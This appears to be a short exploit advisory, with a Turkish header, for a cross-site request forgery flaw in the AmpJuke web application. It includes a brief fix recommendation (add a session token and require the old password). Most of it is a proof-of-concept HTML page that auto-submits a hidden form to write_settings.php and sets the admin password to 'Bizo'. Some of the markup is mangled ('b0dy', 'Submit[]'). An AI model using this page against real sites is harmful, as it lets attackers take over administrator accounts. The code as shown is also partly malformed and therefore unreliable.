< ------------------- header data start ------------------- >

#############################################################

# Application Name : AmpJuke

# Vulnerable Type : XSRF

# Infection : Uzaktan otomatik olarak admin pass change edilebilir.

# Bug Fix Advice : Form’a Oturum Key’i (Session Token) eklenmeli, eski sifre sorulmalidir.

# author : Bug Researchers/BizaRRo

############################################################

< ------------------- header data end of ------------------- >



< -- bug code start -- >

<b0dy onLoad=Submit();>
<script>function Submit[]{document.setup.submit();}</script>

<FORM NAME=setup method=POST action=http://www.site.org/[PATCH]/write_settings.php>

<input type=hidden name=change_password_1 class=tfield size=15 value=Bizo>
<input type=hidden name=change_password_2 class=tfield size=15 value=Bizo>

<input type=submit class=tfield value=Save & continue name=submit>



< -- bug code end of -- >